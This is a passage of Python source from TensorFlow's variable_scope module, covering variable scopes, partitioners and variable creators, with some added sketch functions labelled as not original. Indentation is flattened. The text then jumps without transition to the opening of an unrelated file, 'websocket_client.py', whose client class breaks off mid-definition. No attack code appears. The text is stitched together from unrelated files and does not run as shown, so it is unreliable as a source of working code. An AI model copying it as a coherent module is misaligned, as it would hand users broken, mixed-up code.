"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
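# A minimal, hedged graph-mode sketch (not part of the original module): the
# public way to obtain a sharded variable is get_variable with a partitioner.
# Here fixed_size_partitioner(2) splits a [10, 4] variable into two [5, 4]
# shards along axis 0. Assumes tensorflow.python.ops.partitioned_variables is
# importable in this build.
def _sketch_partitioned_get_variable():
  from tensorflow.python.ops import partitioned_variables
  with ops.Graph().as_default():
    w = get_variable(
        "w",
        shape=[10, 4],
        dtype=dtypes.float32,
        partitioner=partitioned_variables.fixed_size_partitioner(2))
    shards = list(w)        # `w` is a PartitionedVariable
    assert len(shards) == 2
    return [s.shape.as_list() for s in shards]   # [[5, 4], [5, 4]]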
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is
not self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
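# A minimal, hedged graph-mode sketch (not part of the original module): when
# variable scopes with custom getters are nested, the inner getter is handed a
# getter that already applies the outer one, so both wrappers run for a single
# get_variable call (inner first, then outer, then the true getter).
def _sketch_chained_custom_getters():
  calls = []

  def outer_getter(getter, name, *args, **kwargs):
    calls.append("outer")
    return getter(name, *args, **kwargs)

  def inner_getter(getter, name, *args, **kwargs):
    calls.append("inner")
    return getter(name, *args, **kwargs)

  with ops.Graph().as_default():
    with variable_scope("outer", custom_getter=outer_getter):
      with variable_scope("inner", custom_getter=inner_getter):
        get_variable("v", shape=[1])
  return calls   # ["inner", "outer"]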
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.compat.v1.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.compat.v1.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("foo", reuse=True):
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.compat.v1.variable_scope("foo") as scope:
v = tf.compat.v1.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
v1 = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.compat.v1.variable_scope("foo", reuse=True):
v = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as multiplication. See the related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scope names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For example:
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`; this name will be uniquified. If `name_or_scope` is provided, it
won't be used, so it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
reuse mode for this scope as well as all sub-scopes; if
tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
return them otherwise; if None, we inherit the parent scope's reuse
flag. When eager execution is enabled, new variables are always created
unless an EagerVariableStore or template is currently active.
dtype: type of variables created in this scope (defaults to the type in
the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is not
inherited, and it only takes effect once, when the scope is created. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
finally:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(
name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a list of
partitions.
shape: shape of the `Tensor` to partition, must have at least two
dimensions.
dtype: dtype of the elements in the `Tensor`.
Returns:
A list with elements >=1 and exactly one >1. The index of that
element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s" %
slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError("Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
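# A minimal, hedged pure-Python sketch (not part of the original module) of how
# a partitioner's output becomes shard shapes: for a [10, 4] variable, a
# partitioner returning [3, 1] means three shards along axis 0, and the excess
# row goes to the earliest shards.
def _sketch_partition_slicing():
  slicing = [3, 1]   # hypothetical partitioner output for shape [10, 4]
  slice_dim, num_slices = _get_slice_dim_and_num_slices(slicing)
  return list(_iter_slices([10, 4], num_slices, slice_dim))
  # [([0, 0], [4, 4]), ([4, 0], [3, 4]), ([7, 0], [3, 4])]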
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
else:
return variables.RefVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
expected_shape=expected_shape,
import_scope=import_scope,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create one, rather than calling Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True`, unless `synchronization` is
set to `ON_READ`, in which case it defaults to `False`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create one, rather than calling Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
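# A minimal, hedged graph-mode sketch (not part of the original module) of a
# composable variable creator: it records the name of every variable created
# under the scope and then defers to next_creator, as the docstring above
# describes. The recorded names in the trailing comment are illustrative.
def _sketch_logging_variable_creator():
  created = []

  def logging_creator(next_creator, **kwargs):
    created.append(kwargs.get("name"))
    return next_creator(**kwargs)

  with ops.Graph().as_default():
    with variable_creator_scope_v1(logging_creator):
      variables.VariableV1(1.0, name="x")
      get_variable("y", shape=[2])
  return created   # e.g. ["x", "y"]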
|
websocket_client.py
|
# encoding: UTF-8
import json
import ssl
import sys
import traceback
import socket
from datetime import datetime
from threading import Lock, Thread
from time import sleep
import websocket
class WebsocketClient(object):
"""
Websocket API
After creating the client object, use start() to run worker and ping threads.
The worker thread connects websocket automatically.
Use stop to stop threads and disconnect websocket before destroying the client
object (especially when exiting the programme).
Default serialization format is json.
Callbacks to override:
* unpack_data
* on_connected
* on_disconnected
* on_packet
* on_error
After start() is called, the ping thread will ping the server every ping_interval seconds (60 by default).
If you want to send anything other than JSON, override send_packet.
"""
def __init__(self):
"""Constructor"""
self.host = None
self._ws_lock = Lock()
self._ws = None
self._worker_thread = None
self._ping_thread = None
self._active = False
self.proxy_host = None
self.proxy_port = None
self.ping_interval = 60 # seconds
self.header = {}
# For debugging
self._last_sent_text = None
self._last_received_text = None
def init(self, host: str, proxy_host: str = "", proxy_port: int = 0, ping_interval: int = 60, header: dict = None):
